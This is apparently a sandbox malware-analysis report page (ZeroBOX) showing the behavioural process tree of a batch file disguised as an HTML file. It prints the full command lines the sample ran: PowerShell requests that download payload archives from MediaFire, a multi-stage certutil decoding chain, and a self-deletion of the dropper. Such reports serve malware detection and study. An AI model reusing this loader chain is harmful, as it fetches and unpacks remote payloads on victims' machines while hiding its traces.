popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iyfsPiQmGGeVn" C:\Users\test22\AppData\Local\Temp\impactfulbrands.co.uk__________________________________________.html.bat

    2552

    • cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\impactfulbrands.co.uk__________________________________________.html.bat

      2624

      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/uq6estxvdnk3zze/ofeduqin1.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\weba.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2840

      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://www.mediafire.com/file/hzktcfc598wc4c7/bipucowova2.rar/file'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\webb.html', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2940

      • cmd.exe C:\Windows\system32\cmd.exe /c find "https://download" C:\Users\test22\AppData\Local\Temp\weba.html | find /i ".rar"

        3044

      • cmd.exe C:\Windows\system32\cmd.exe /c find "https://download" C:\Users\test22\AppData\Local\Temp\webb.html | find /i ".rar"

        2100

      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://download2275.mediafire.com/j1wfd498a9kgLf3itD5hwAm6GnB3TusSTZTc-mMhVvYN0hqwTQjJQ_hx8vgk3fcKOnDmVLRUteddrj73aOXA_Edxuym5EabDMzK_5X7yVYmIbgLFneKrfI2j3kF0iKqyYl0a_Z_m15qv351FgpQdY81ekwmLjEjQ4mvXkBuJmCO1hFQ/uq6estxvdnk3zze/ofeduqin1.rar'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\playvideoa.a', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2260

      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create('https://download2280.mediafire.com/gz03sbm5gh5g44MooGxCNLMCcMyIm4BOqLSx4UrogWrZG41rW7VDf8OqrrlhRfdehhZ-hfT7jlPw29vnZnH6xlDoFSCu0tNkT7Ht5v8HV1Bnaxlx3DTHaBrI291FxT3JffMDP6Z7nT2_i3vfiuQHn2S352byuVCUHH7QtsvDi1I7OA/hzktcfc598wc4c7/bipucowova2.rar'); $request.UserAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36'; $response = $request.GetResponse(); $responseStream = $response.GetResponseStream(); $fileStream = New-Object System.IO.FileStream('C:\Users\test22\AppData\Local\Temp\playvideob.f', [System.IO.FileMode]::Create); [byte[]]$buffer = New-Object byte[] 1024; while(($bytesRead = $responseStream.Read($buffer, 0, $buffer.Length)) -gt 0) { $fileStream.Write($buffer, 0, $bytesRead); } $fileStream.Close(); $responseStream.Close(); }"

        2572

      • powershell.exe powershell -Command "& { $request = [System.Net.WebRequest]::Create($env:url); $request.Method = 'GET'; $request.Referer = $env:referer; $request.UserAgent = $env:userAgent; $response = $request.GetResponse(); $stream = $response.GetResponseStream(); $reader = New-Object System.IO.StreamReader($stream); $content = $reader.ReadToEnd(); $reader.Close(); $response.Close(); }"

        2780

      • certutil.exe certutil -decode C:\Users\test22\AppData\Local\Temp\playvideoa.a C:\Users\test22\AppData\Local\Temp\playvideoa.b

        2824

      • certutil.exe certutil -decode C:\Users\test22\AppData\Local\Temp\playvideoa.b C:\Users\test22\AppData\Local\Temp\playvideoa.c

        2880

      • certutil.exe certutil -decode C:\Users\test22\AppData\Local\Temp\playvideoa.c C:\Users\test22\AppData\Local\Temp\playvideoa.d

        2972

      • cmd.exe CMD /C DEL C:\Users\test22\AppData\Local\Temp\impactfulbrands.co.uk__________________________________________.html.bat

        2104

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf